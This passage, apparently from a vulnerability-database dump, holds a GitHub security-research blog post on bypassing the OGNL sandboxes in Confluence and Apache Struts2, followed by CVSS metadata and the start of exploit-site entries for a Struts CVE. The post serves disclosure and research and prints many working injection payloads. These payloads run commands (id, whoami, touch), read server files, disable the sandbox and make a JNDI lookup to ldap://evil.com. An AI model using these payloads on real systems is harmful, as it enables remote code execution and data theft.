`getClass` or `getClassLoader`.\n * If node is an `ASTVarRef`, check if the variable name is in `UNSAFE_VARIABLE_NAMES` block list: \n * `#application`\n * `#parameters`\n * `#request`\n * `#session`\n * `#_memberAccess`\n * `#context`\n * `#attr`\n * If node in an `ASTConst` (eg: a string literal), call `isSafeExpressionInternal` which will check the string against a block list (for example, harmful class names) and, in addition, it will parse the string literal as an OGNL expression and apply the `containsUnsafeExpression()` recursive checks on it.\n * If a node has children, repeat the process for the children.\n\nThis is a pretty comprehensive control since it parses the AST recursively and makes sure that any AST nodes considered harmful are either rejected or inspected further.\n\nMCKSysAr bypass was based on two things: A) `Class` and `ClassLoader` properties were not accounted for when inspecting `ASTProperty` nodes; and B) `\u201djava.lang.\u201d + \u201cRuntime\u201d` was parsed as an `ASTAdd` node with two `ASTConst` children. None of them matched any of the known harmful strings and when parsed as an OGNL expression, none of them were valid expressions so they were not parsed further. A) Was fixed quickly by disallowing access to `Class` and `ClassLoader` properties, but B) was not fixed since it was considered as a security in-depth control (it's impossible to analyze all variants in which a malicious string could be written).\n\nWith that in mind I took a look at the[ list of the OGNL AST nodes](<https://github.com/orphan-oss/ognl/tree/master/src/main/java/ognl>) to see if there was anything interesting that was not accounted for in the `isSafeExpression()` method.\n\n### Enter `ASTEval`[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#enter-asteval>)\n\nThe first one that got my attention was `ASTEval`. It looked very interesting and it was not accounted for by the `containsUnsafeExpression()` method.\n\n`ASTEval` are nodes in the form of `(expr)(root)` and they will parse the `expr` string into a new AST and evaluate it with `root` as its root node. This will allow us to provide an OGNL expression in the form of a string `(ASTConst)` and evaluate it! We know that `ASTConst` nodes are parsed as OGNL expressions and verified to not be harmful. However, we already saw that if we split the string literal in multiple parts, only the individual parts will be checked and not the result of the concatenation. For example, for the payload below `#application` will never get checked, only `#` and `application` which are deemed to be safe:\n\n \n![An AST tree of the expression showing all the AST nodes the expression is parsed into.](https://github.blog/wp-content/uploads/2023/01/image5-2.png?w=484&resize=484%2C263) \n\n\nAs you can see in the resulting tree, there are no hints of any `ASTVarRef` node and therefore access to `#application` is granted.\n\n### Weaponizing `ASTEval`[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#weaponizing-asteval>)\n\nThere are multiple ways to craft a payload levering this vector. For example, we could get arbitrary RCE with echoed response:\n \n \n ('(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@get'+'Runtime().exec(\"id\").getInputStream(),\"utf-8\")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(\"X-Cmd-Response\",#a))')('')\n \n \n\n![The screenshot shows a response from the Confluence server including an `X-Cmd-Response` which shows the output of the `id` command.](https://github.blog/wp-content/uploads/2023/01/image3-4.png?w=1024&resize=1024%2C332)\n\n### Enter `ASTMap`, `ASTChain` and `ASTSequence`[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#enter-astmap-astchain-and-astsequence>)\n\nI was already familiar with `ASTMap`s from reading [Mc0wn's great article](<https://mc0wn.blogspot.com/2021/04/exploiting-struts-rce-on-2526.html>). In a nutshell, OGNL allows developers to instantiate any `java.util.Map` implementation by using the `@<class_name>@{}` syntax.\n\nUsing this technique, we were able to use a `BeanMap` (a map wrapping a Java bean and exposing its getters and setters as map entries) to bypass the `getClass` limitation by rewriting the payload as:\n \n \n \n BeanMap map = @org.apache.commons.beanutils.BeanMap@{};\n \n map.setBean(\u201c\u201d)\n \n map.get(\u201cclass\u201d).forName(\u201djavax.script.ScriptEngineManager\u201d).newInstance().getEngineByName(\u201cjs\u201d).eval(payload)\n \n \n\nThis payload avoids calling the `BeanMap` constructor explicitly and, therefore, gets rid of the `ASTCtor` limitation. In addition, it allows us to call `Object.getClass()` implicitly by accessing the `class` item. However, we still have another problem: we need to be able to assign the map to a variable (`map`) so we can call the `setBean()` method on it and later call the `get()` method on the same map. Since `ASTAssign` was blocked, assignments were not an option. Fortunately, looking through the list of AST nodes, two more nodes got my attention: `ASTChain` and `ASTSequence`.\n\n * `ASTChain` allows us to pass the result of one evaluation as the root node of the next evaluation. For example: `(one).(two)` will evaluate `one` and use its result as the root for the evaluation of `two`.\n * `ASTSequence` allows us to run several evaluations on the same root object in sequence. For example: `one, two` will evaluate `one` and then `two` using the same root node.\n\nThe idea was to bypass `ASTAssign` constraint by combining `ASTChain` and `ASTSequence` together\n\nWe can set the map returned by the `ASTMap` expression as the root for a sequence of expressions so all of them will have the map as its root object:\n \n \n \n (#@BeanMap@{}).(expression1, expression2)\n \n \n\nIn our case, `expression1` is the call to `setBean()` and `expression2` is the call to `get()`.\n\nTaking that into account and splitting literal strings into multiple parts to bypass the block list we got the following payload:\n \n \n \n (#@org.apache.commons.beanutils.BeanMap@{}).(setBean(''),get('cla'+'ss').forName('javax'+'.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('7*7'))\n \n \n\nThe final AST tree bypassing all `isSafeExpression` checks is:\n\n \n![An AST tree of the payload showing all the AST nodes the expression is parsed into.](https://github.blog/wp-content/uploads/2023/01/image2-5.png?w=1024&resize=1024%2C496) \n\n\nThere was a final problem to solve. The OGNL injection sink was `translateVariable()` which resolves OGNL expressions wrapped in `${expressions}` delimiters. Therefore, our payload was not allowed to contain any curly brackets. Fortunately, for us, [OGNL will replace unicode escapes](<https://github.com/apache/commons-ognl/blob/master/src/main/jjtree/ognl.jjt#L36-L37>) for us so we were able to use the final payload:\n \n \n \n (#@org.apache.commons.beanutils.BeanMap@\\\\u007b\\\\u007d).(setBean(''),get('cla'+'ss').forName('javax'+'.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('7*7'))\n \n \n\nI submitted these bypasses to Atlassian through its bug bounty program and, even though I was not reporting any new OGNL injections but a bypass of its sandbox, they were kind enough to award me with a $3,600 bounty!\n\n## Looking into Struts2[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#looking-into-struts2>)\n\nAs mentioned before, a friend found what he thought was a Server-Side Template Injection (SSTI) (`%{7*7}` => 49) but it turned out to be an OGNL injection. Since this happened as part of a bug bounty program, I didn\u2019t have access to the source code. I can't be sure if the developers were passing untrusted data to an OGNL sink (for example, `[ActionSupport.getText()](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ActionSupport.html#getText-java.lang.String->)`), or if it was some of the [unfixed double evaluations issues](<https://securitylab.github.com/advisories/GHSL-2020-205-double-eval-dynattrs-struts2/>) (still working at the time of writing). Anyhow, the application seemed to be using the latest Struts version and known payloads were not working. I decided to take a deeper look.\n\n### New gadgets on the block[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#new-gadgets-on-the-block>)\n\nWhen I listed what objects were available I was surprised to find that many of the usual objects in the Struts OGNL context, such as the value stack, were not there, and some others I haven't seen before were available. One of such objects was `#request[\u2018.freemarker.TemplateModel\u2019]`. This object turned out to be an instance of `org.apache.struts2.views.freemarker.ScopesHashModel` containing a variety of new objects. One of them (stored under the `ognl` key) gave me access to an `org.apache.struts2.views.jsp.ui.OgnlTool` instance. Looking at the code for this class I quickly spotted that it was calling `Ognl.getValue()`. This class is not part of Struts, but the OGNL library and, therefore, the Struts sandbox (member access policy) was not enabled! In order to exploit it I used the following payload:\n \n \n \n #request[\u2018.freemarker.TemplateModel\u2019].get(\u2018ognl\u2019).getWrappedObject().findValue(\u2018(new freemarker.template.utility.Execute()).exec({\u201cwhoami\u201d})\u2019, {})\n \n \n\nThat was enough to get the issue accepted as a remote code execution in the bounty program. However, despite having achieved RCE, there were a few unsolved questions:\n\n * Why was this `.freemarker.TemplateModel` object available?\n * Are there any other ways to get RCE on the latest Struts versions?\n\n### Post-invocations Context[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#post-invocations-context>)\n\nAttackers are limited to the objects they are able to access. Normally, OGNL injections take place before the action invocation completes and the action\u2019s `Result` is rendered.\n\n![Diagram of Struts request handling. It shows how an action is invoked and the different components involved.](https://github.blog/wp-content/uploads/2023/01/image6-2.png?w=640&fit=1024%2C1024)https://struts.apache.org/core-developers/attachments/Struts2-Architecture.png\n\nWhen grepping the Struts\u2019s source code for `.freemarker.TemplateModel`, I found out that there are plenty of new objects added to the request scope when preparing the action\u2019s `Result` in order to share them with the view layer (JSP, FreeMarker or Velocity) and `.freemarker.TemplateModel` was [one of them](<https://github.com/apache/struts/blob/266d2d4ed526edbb8e8035df94e94a1007d7c360/core/src/main/java/org/apache/struts2/views/freemarker/FreemarkerManager.java#L122>). However, those objects are only added after the `ActionInvocation` has been invoked. This implies that if I find `.freemarker.TemplateModel` on the request scope, my injection was evaluated after the action invocation finished building the action\u2019s `Result` object and, therefore, my injection probably did not take place as part of the Struts code but as a [double evaluation in the FreeMarker template](<https://securitylab.github.com/advisories/GHSL-2020-205-double-eval-dynattrs-struts2/>).\n\nThese new objects will offer new ways to get remote code execution, but only if you are lucky to get your injection evaluated after the action\u2019s `Result` has been built. Or not? ![\ud83e\udd14](https://s.w.org/images/core/emoji/14.0.0/72x72/1f914.png)\n\nIt turned out that the ongoing `ActionInvocation` object can be accessed through the OGNL context and, therefore, we can use it to force the building of the `Result` object in advance. Calling the `Result`s `doExecute()` method will trigger the population of the so-called template model. For example, for Freemarker, `ActionInvocation.createResult()` will create a `FreemarkerResult` instance. Calling its `doExecute()` method will, in turn, call its `[createModel()](<https://github.com/apache/struts/blob/266d2d4ed526edbb8e8035df94e94a1007d7c360/core/src/main/java/org/apache/struts2/views/freemarker/FreemarkerResult.java#L273>)` method that will populate the template model.\n \n \n \n (#ai=#attr['com.opensymphony.xwork2.ActionContext.actionInvocation'])+\n \n (#ai.setResultCode(\"success\"))+\n \n (#r=#ai.createResult())+\n \n (#r.doExecute(\"pages/test.ftl\",#ai))\n \n \n\nExecuting the above payload will populate the request context with new objects. However, that requires us to know the result code and the template\u2019s path. Fortunately, we can also invoke the `ActionInvocation.invoke()` method that will take care of everything for us!\n \n \n \n #attr['com.opensymphony.xwork2.ActionContext.actionInvocation'].invoke()\n \n \n\nThe line above will result in the template model being populated and stored in the request, and context scopes regardless of where your injection takes place.\n\n### Wild objects appeared[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#wild-objects-appeared>)\n\nAfter the invocation, the request scope and value stack will be populated with additional objects. These objects vary depending on the view layer used. What follows is a list of the most interesting ones (skipping most of them which do not lead to RCE):\n\nFor Freemarker:\n\n * `.freemarker.Request` (`freemarker.ext.servlet.HttpRequestHashModel`)\n * `.freemarker.TemplateModel` (`org.apache.struts2.views.freemarker.ScopesHashModel`) \n * `__FreeMarkerServlet.Application__` (`freemarker.ext.servlet.ServletContextHashModel`) \n * `JspTaglibs` (`freemarker.ext.jsp.TaglibFactory`)\n * `.freemarker.RequestParameters` (`freemarker.ext.servlet.HttpRequestParametersHashModel`)\n * `.freemarker.Request` (`freemarker.ext.servlet.HttpRequestHashModel`)\n * `.freemarker.Application` (`freemarker.ext.servlet.ServletContextHashModel`) \n * `.freemarker.JspTaglibs` (`freemarker.ext.jsp.TaglibFactory`) \n * `ognl` (`org.apache.struts2.views.jsp.ui.OgnlTool`) \n * `stack` (`com.opensymphony.xwork2.ognl.OgnlValueStack`) \n * `struts` (`org.apache.struts2.util.StrutsUtil`) \n\nFor JSPs:\n\n * `com.opensymphony.xwork2.dispatcher.PageContext` (`PageContextImpl`)\n\nFor Velocity:\n\n * `.KEY_velocity.struts2.context` -> (`StrutsVelocityContext`) \n * `ognl` (`org.apache.struts2.views.jsp.ui.OgnlTool`)\n * `struts` (`org.apache.struts2.views.velocity.result.VelocityStrutsUtils`)\n\n### Getting RCE with new objects[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#getting-rce-with-new-objects>)\n\nAnd now let\u2019s have some fun with these new objects! In the following section I will explain how I was able to leverage some of these objects to get remote code execution.\n\n#### ObjectWrapper[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#objectwrapper>)\n\nThere may be different ways to get an instance of a FreeMarker\u2019s `ObjectWrapper`, even if the application is not using FreeMarker as its view layer because Struts uses it internally for rendering JSP tags. A few of them are listed below:\n\n * Through `freemarker.ext.jsp.TaglibFactory.getObjectWrapper()`. Even though Struts\u2019 sandbox forbids access to `freemarker.ext.jsp` package, we can still access it using a BeanMap:\n \n \n \n (#a=#@org.apache.commons.collections.BeanMap@{ })+\n \n (#a.setBean(#application[\".freemarker.JspTaglibs\"]))+\n \n (#a['objectWrapper'])\n \n \n\n * Through `freemarker.ext.servlet.HttpRequestHashModel.getObjectWrapper()`:\n \n \n \n (#request.get('.freemarker.Request').objectWrapper)\n \n \n\n * Through `freemarker.core.Configurable.getObjectWrapper()`. We need to use the BeanMap trick to access it since `freemarker.core` is also blocklisted:\n \n \n \n (#a=#@org.apache.commons.collections.BeanMap@{ })+\n \n (#a.setBean(#application['freemarker.Configuration']))+\n \n #a['objectWrapper']\n \n \n\nNow for the fun part, what can we do with an `ObjectWrapper`? There are three interesting methods we can leverage to get RCE:\n\n**`newInstance(class, args)`**\n\nThis method will allow us to instantiate an arbitrary type. Arguments must be wrapped, but the return value is not. For example, we can trigger a JNDI injection lookup:\n \n \n \n objectWrapper.newInstance(@javax.naming.InitialContext@class,null).lookup(\"ldap://evil.com\")\n \n \n\nOr, if Spring libs are available, we can get RCE by supplying a malicious [XML config](<https://raw.githubusercontent.com/irsl/jackson-rce-via-spel/master/spel.xml>) for `FileSystemXmlApplicationContext` constructor:\n \n \n \n objectWrapper.newInstance(@org.springframework.context.support.FileSystemXmlApplicationContext@class,{#request.get('.freemarker.Request').objectWrapper.wrap(\"URL\")})\n \n \n\n`**getStaticModels()`**\n\nThis method allows us to get static fields from arbitrary types. The return object is wrapped in a FreeMarker\u2019s `TemplateModel` so we need to unwrap it. An example payload levering [Text4Shell](<https://securitylab.github.com/advisories/GHSL-2022-018_Apache_Commons_Text/>):\n \n \n \n objectWrapper.staticModels.get(\"org.apache.commons.text.lookup.StringLookupFactory\").get(\"INSTANCE\").getWrappedObject().scriptStringLookup().lookup(\"javascript:3+4\")\n \n \n\n`**wrapAsAPI()`**\n\nThis method allows us to wrap any object with a `freemarker.ext.beans.BeanModel` giving us indirect access to its getters and setters methods. Struts\u2019 sandbox will not have visibility on these calls and therefore they can be used to call any blocklisted method.\n\n * `BeanModel.get('field_name')` returns a `TemplateModel` wrapping the object.\n * `BeanModel.get('method_name')` returns either a `SimpleMethodModel` or `OverloadedMethodsModel` wrapping the method.\n\nWe can, therefore, call any blocklisted method with:\n \n \n \n objectWrapper.wrapAsAPI(blocked_object).get(blocked_method)\n \n \n\nThis call will return an instance of `TemplateMethodModelEx`. Its `[exec()](<https://freemarker.apache.org/docs/api/freemarker/template/TemplateMethodModelEx.html#exec-java.util.List->)` method is defined in the `freemarker.template` namespace and, therefore, trying to invoke this method will get blocked by the Struts sandbox. However, `TemplateMethodModelEx` is an interface and what we will really get is an instance of either `freemarker.ext.beans.SimpleMethodModel` or `freemarker.ext.beans.OverloadedMethodsModel`. Since the `exec()` methods on both of them are defined on the `freemarker.ext.beans` namespace, which is not blocklisted, their invocation will succeed. As we saw before, arguments need to be wrapped. As an example we can call the `File.createTempFile(\u201cPREFIX\u201d, \u201cSUFFIX\u201d)` using the following payload:\n \n \n \n objectWrapper.getStaticModels().get(\"java.io.File\").get(\"createTempFile\").exec({objectWrapper.wrap(\"PREFIX\"), objectWrapper.wrap(\"SUFFIX\")})\n \n \n\nWe can achieve the same by calling the `getAPI()` on any `freemarker.template.TemplateModelWithAPISupport` instance. Many of the FreeMarker exposed objects inherit from this interface and will allow us to wrap them with a `BeanModel`. For example, to list all the keys in the Struts Value Stack we can use:\n \n \n \n #request['.freemarker.TemplateModel'].get('stack').getAPI().get(\"context\").getAPI().get(\"keySet\").exec({})\n \n \n\nNote that `com.opensymphony.xwork2.util.OgnlContext.keySet()` would be blocked since it belongs to the `com.opensymphony.xwork2.util` namespace, but in this case, Struts\u2019 sandbox will only see calls to `TemplateHashModel.get()` and `TemplateModelWithAPISupport.getAPI()` which are both allowed.\n\nThe last payload will give us a complete list of all available objects in the Value Stack, many of which could be used for further attacks. Lets see a more interesting example by reading an arbitrary file using `BeanModel`s:\n \n \n \n (#bw=#request.get('.freemarker.Request').objectWrapper).toString().substring(0,0)+\n \n (#f=#bw.newInstance(@java.io.File@class,{#bw.wrap(\"C:\\\\REDACTED\\\\WEB-INF\\\\web.xml\")}))+ \n \n (#p=#bw.wrapAsAPI(#f).get(\"toPath\").exec({}))+\n \n (#ba=#bw.getStaticModels().get(\"java.nio.file.Files\").get(\"readAllBytes\").exec({#bw.wrap(#p)}))+\n \n \"----\"+\n \n (#b64=#bw.getStaticModels().get(\"java.util.Base64\").get(\"getEncoder\").exec({}).getAPI().get(\"encodeToString\").exec({#bw.wrap(#ba)}))\n \n \n\nOr listing the contents of a directory:\n \n \n \n (#bw=#request.get('.freemarker.Request').objectWrapper).toString().substring(0,0)+\n \n (#dir=#bw.newInstance(@java.io.File@class,{#bw.wrap(\"C:\\\\REDACTED\\\\WEB-INF\\\\lib\")}))+ \n \n (#l=#bw.wrapAsAPI(#dir).get(\"listFiles\").exec({}).getWrappedObject())+\"---\"+\n \n (#l.{#this})\n \n \n\n#### OgnlTool/OgnlUtil[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#ognltool-ognlutil>)\n\nThe `org.apache.struts2.views.jsp.ui.OgnlTool` class was calling `Ognl.getValue()` with no `OgnlContext` and even though the Ognl library will take care of creating a default one, it will not include all the additional security checks added by the Struts framework and is easily bypassable:\n \n \n \n package org.apache.struts2.views.jsp.ui;\n \n import ognl.Ognl;\n \n import ognl.OgnlException;\n \n import com.opensymphony.xwork2.inject.Inject;\n \n public class OgnlTool {\n \n private OgnlUtil ognlUtil;\n \n public OgnlTool() { }\n \n \n \n @Inject\n \n public void setOgnlUtil(OgnlUtil ognlUtil) {\n \n this.ognlUtil = ognlUtil;\n \n }\n \n \n \n public Object findValue(String expr, Object context) {\n \n try {\n \n return Ognl.getValue(ognlUtil.compile(expr), context);\n \n } catch (OgnlException e) {\n \n return null;\n \n }\n \n }\n \n }\n \n \n\nWe can get an instance of `OgnlTool` from both FreeMarker and Velocity post-invocation contexts:\n \n \n \n #request['.freemarker.TemplateModel'].get('ognl')\n \n \n\nOr\n \n \n \n #request['.KEY_velocity.struts2.context'].internalGet('ognl')\n \n \n\nFor FreeMarker\u2019s case, it will come up wrapped with a Template model but we can just unwrap it and use it to get RCE:\n \n \n \n (#a=#request.get('.freemarker.Request').objectWrapper.unwrap(#request['.freemarker.TemplateModel'].get('ognl'),'org.apache.struts2.views.jsp.ui.OgnlTool'))+\n \n (#a.findValue('(new freemarker.template.utility.Execute()).exec({\"whoami\"})',null))\n \n \n\nOr, even simpler:\n \n \n \n #request['.freemarker.TemplateModel'].get('ognl').getWrappedObject().findValue('(new freemarker.template.utility.Execute()).exec({\"whoami\"})',{})\n \n \n\n`OgnlTool` was [inadvertently fixed](<https://github.com/apache/struts/commit/5cd409d382e00b190bfe4e957c4167d06b8f9da1#diff-55821720c975d84350d796bec09aa366cc2b2861fb7e12f223cc5a4453b55640>) when Struts 6.0.0 was released by upgrading to OGNL 3.2.2 which always requires a `MemberAccess`. But the latest Struts 2 version (2.5.30) is still vulnerable to this payload.\n\n#### StrutsUtil[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#strutsutil>)\n\nAnother object that can be accessed in the post-invocation context is an instance of `org.apache.struts2.util.StrutsUtil`. There are plenty of interesting methods in here:\n\n * `public String include(Object aName)` can be used to read arbitrary resources \n * `<struts_utils>.include(\"/WEB-INF/web.xml\")`\n * `public Object bean(Object aName)` can be used to instantiate arbitrary types: \n * `<struts_utils>.bean(\"javax.script.ScriptEngineManager\")`\n * `public List makeSelectList(String selectedList, String list, String listKey, String listValue)`\n * `listKey` and `listValue` are evaluated with OgnlTool and therefore in an unsandboxed context\n * `<struts_utils>.makeSelectList(\"#this\",\"{'foo'}\",\"(new freemarker.template.utility.Execute()).exec({'touch /tmp/bbbb'})\",\"\")`\n\nOn applications using Velocity as its view layer, this object will be an instance of `VelocityStrutsUtil` which extends `StrutsUtils` and provides an additional vector:\n\n * `public String evaluate(String expression)` will allow us to evaluate a string containing a velocity template:\n \n \n \n (<struts_utils>.evaluate(\"#set ($cmd='java.lang.Runtime.getRuntime().exec(\\\"touch /tmp/pwned_velocity\\\")') $application['org.apache.tomcat.InstanceManager'].newInstance('javax.script.ScriptEngineManager').getEngineByName('js').eval($cmd)\"))\n \n \n\n#### JspApplicationContextImpl[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#jspapplicationcontextimpl>)\n\nThe last vector that I wanted to share is one that I found a few years ago and that I was not able to exploit\u2013although I was pretty sure that there had to be a way. New post-invocation discovered objects finally made this possible!\n\nIf you have inspected the Struts Servlet context (`#application`) in the past you probably saw an item with key `org.apache.jasper.runtime.JspApplicationContextImpl` which returned an instance of `org.apache.jasper.runtime.JspApplicationContextImpl`. This class contains a method called `getExpressionFactory()` that returns an Expression Factory that will expose a `createValueExpression()` method. This looks like a perfect place to create an EL expression and evaluate it. The problem was that `[createValueExpression](<https://docs.oracle.com/javaee/7/api/javax/el/ExpressionFactory.html#createValueExpression-javax.el.ELContext-java.lang.String-java.lang.Class->)` requires an instance of `ELContext` and we had none.\n\nFortunately, our post-invocation technique brought a new object into play. When using JSPs as the view layer, `#request['com.opensymphony.xwork2.dispatcher.PageContext']` will return an uninitialized `org.apache.jasper.runtime.PageContextImpl` instance that we can use to create an `ELContext` and evaluate arbitrary EL expressions:\n \n \n \n (#attr['com.opensymphony.xwork2.ActionContext.actionInvocation'].invoke())+\n \n (#ctx=#request['com.opensymphony.xwork2.dispatcher.PageContext'])+\n \n (#jsp=#application['org.apache.jasper.runtime.JspApplicationContextImpl'])+\n \n (#elctx=#jsp.createELContext(#ctx))+\n \n (#jsp.getExpressionFactory().createValueExpression(#elctx, '7*7', @java.lang.Class@class).getValue(#elctx))\n \n \n\nThe avid readers may be wondering why Struts stores the `PageContext` in the request. Well, turns out, it does not, but we can access it through chained contexts.\n\nWhen accessing `#attr` (`AttributeMap`), [we can indirectly look into multiple scopes](<https://struts.apache.org/maven/struts2-core/apidocs/org/apache/struts2/util/AttributeMap.html>) such as the Page, Request, Session and Application (Servlet). But there is more, `org.apache.struts2.dispatcher.StrutsRequestWrapper.getAttribute()` will look for the attribute in the `ServletRequest`, if it can't find it there, [it will search the value stack](<https://github.com/apache/struts/blob/master/core/src/main/java/org/apache/struts2/dispatcher/StrutsRequestWrapper.java#L94>)! So, we can effectively access the value stack through the `#request` or `#attr` variables.\n\nIn this case, the `PageContext` was not stored in the request scope, but in the Value stack, and we are able to access it through chained context searches.\n\nWe can even run arbitrary OGNL expressions as long as they don\u2019t contain any hashes (`#`), for example, `#request[\"@java.util.HashMap@class\"]` will return the `HashMap` class.\n\n### Leveling up the BeanMap payload[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#leveling-up-the-beanmap-payload>)\n\nYou may already be familiar with McOwn\u2019s [technique](<https://mc0wn.blogspot.com/2021/04/exploiting-struts-rce-on-2526.html>). He realized that it was possible to use [OGNL Map notation](<https://commons.apache.org/proper/commons-ognl/language-guide.html>) to instantiate an `org.apache.commons.collections.BeanMap` by using the `#@org.apache.commons.collections.BeanMap@{ }` syntax, and then it was possible to wrap any Java object on this map and access any getters and setters as map properties. His payload was based on the `org.apache.tomcat.InstanceManager` payload we introduced at [Black Hat 2020](<https://i.blackhat.com/USA-20/Wednesday/us-20-Munoz-Room-For-Escape-Scribbling-Outside-The-Lines-Of-Template-Security-wp.pdf>) and looked like:\n \n \n \n (#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n \n (#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +\n \n (#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n \n (#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +\n \n (#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n \n (#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +\n \n (#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\n \n (#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\n \n (#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'calc.exe'}))\n \n \n\nThe payload was basically disabling the OGNL sandbox and then accessing otherwise blocked classes such as `InstanceManager`. There is a simpler way to abuse BeanMaps that do not require to disable the sandbox and that is using reflection:\n \n \n \n (#c=#@org.apache.commons.beanutils.BeanMap@{})+\n \n (#c.setBean(@Runtime@class))+\n \n (#rt=#c['methods'][6].invoke())+\n \n (#c['methods'][12]).invoke(#rt,'touch /tmp/pwned')\n \n \n\nThis payload also works in Struts 6 if the `BeanClass` is available in the classpath (either from Apache Commons Collections or Apache Commons BeanUtils), but you need to specify the FQN (Fully Qualified Name) name for `Runtime`: `@java.lang.Runtime@class`.\n\n### Timeline[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#timeline>)\n\nThese bypasses were first reported to the Struts and OGNL security teams on June 9, 2022.\n\nOn October 7, 2022, the security team replied to us and stated that improving the block lists was not a sustainable solution, and, therefore, they decided to stop doing it. They highlighted that a [Java Security Manager can be configured](<https://struts.apache.org/security/#proactively-protect-from-ognl-expression-injections-attacks-if-easily-applicable>) to protect every OGNL evaluation from these attacks and we highly recommend doing so if you are running a Struts application. However, bear in mind that the [Security Manager is deprecated](<https://openjdk.org/jeps/411>) and will soon get removed from the JDK.\n\n## That\u2019s a wrap[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#thats-a-wrap>)\n\nAt this point, you will have probably realized that sandboxing an expression language, such as OGNL, is a really difficult task, and may require maintaining a list of blocked classes and OGNL features even though that is not an optimal approach. In this blog post, we have reviewed a few ways in which these sandboxes can be bypassed. Although they are specific to OGNL, hopefully you have learned to explore sandbox controls\u2013and one or two new tricks\u2013that may apply to other sandboxes. In total, we were able to raise $5,600, which we donated to [UNHCR](<https://www.unhcr.org/>) to help provide refuge for Ukrainians seeking protection from the war.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-01-27T16:00:49", "type": "github", "title": "Bypassing OGNL sandboxes for fun and charities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3087", "CVE-2016-4436", "CVE-2017-5638", "CVE-2018-11776", "CVE-2018-1327", "CVE-2020-17530", "CVE-2021-26084", "CVE-2022-26134"], "modified": "2023-01-27T13:33:03", "id": "GITHUB:0519EA92487B44F364A1B35C85049455", "href": "https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-08-28T02:33:40", "description": "Man Yue Mo from the Semmle Security Research team noticed that Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible remote code execution vulnerabilities.", "cvss3": {}, "published": "2018-08-24T00:00:00", "type": "zdt", "title": "Apache Struts 2.x Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-24T00:00:00", "id": "1337DAY-ID-30956", "href": "https://0day.today/exploit/description/30956", "sourceData": "[CVEID]:CVE-2018-11776\r\n[PRODUCT]:Apache Struts\r\n[VERSION]:Apache Struts 2.3 to 2.3.34 and 2.5 to 2.5.16\r\n[PROBLEMTYPE]:Remote Code Execution\r\n[REFERENCES]:https://cwiki.apache.org/confluence/display/WW/S2-057\r\n[DESCRIPTION]:Man Yue Mo from the Semmle Security Research team was\r\nnoticed that Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16\r\nsuffer from possible Remote Code Execution when using results with no\r\nnamespace and in same time, its upper action(s) have no or wildcard\r\nnamespace. Same possibility when using url tag which doesnat have value\r\nand action set and in same time, its upper action(s) have no or wildcard\r\nnamespace.\n\n# 0day.today [2018-08-28] #", "sourceHref": "https://0day.today/exploit/30956", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-16T22:39:09", "description": "This Metasploit module exploits a remote code execution vulnerability in Apache Struts versions 2.3 through 2.3.4, and 2.5 through 2.5.16. Remote code execution can be performed via an endpoint that makes use of a redirect action. Native payloads will be converted to executables and dropped in the server's temp dir. If 